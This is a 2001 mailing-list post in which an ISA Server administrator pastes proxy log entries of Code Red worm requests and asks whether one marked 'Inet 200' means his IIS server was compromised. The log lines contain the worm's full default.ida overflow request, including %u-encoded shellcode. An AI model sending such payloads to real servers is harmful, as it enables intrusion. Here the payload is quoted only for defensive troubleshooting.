ISA Server Code Red Log entries
- From: Nicholas Palmer <NICK@xxxxxxxxxxx>
- To: "'isalist@xxxxxxxxxxxxx'" <isalist@xxxxxxxxxxxxx>
- Date: Mon, 6 Aug 2001 12:32:39 -0700
I've been following the messages here on the latest code red worm and I've
seen several of the entries in my log files (WEBEX.....LOG)
WARNING : Log entries with dangerous links :
WARNING : Log entries with dangerous links :
61.221.240.50 anonymous - 2001-08-04 14:56:07
GATEWAY - www.worm.com <www.worm.com> - - 2323 4039
- - GET
http://www.worm.com/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801
%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u00
78%u0000%u00=a - 12202
And ...
24.1.178.131 anonymous - 2001-08-04 15:09:34
GATEWAY - 209.151.234.200 168.65.50.21 12345 1933 3818 171
http GET
http://168.65.50.21:12345/default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXX Inet 200
My understanding of the first one is that the 12202 at the ends means that
ISA blocked it. But it's the other entry, with the Inet 200 at the end that
I'm concerned about. Doesn't 200 mean that it was succesful. I've applied
the patches from MS faithfully, and when I try the Coderedchecker program I
come out OK. Our IIS Server is on ISA server and I am publishing it with a
destination set that uses the IP address of the external NIC which I read
below could cause a problem. Will this cause me any problems?
Thanks
Nick.
KCI Computing, Inc.
(nick@xxxxxxxxxxx)
Other related posts:
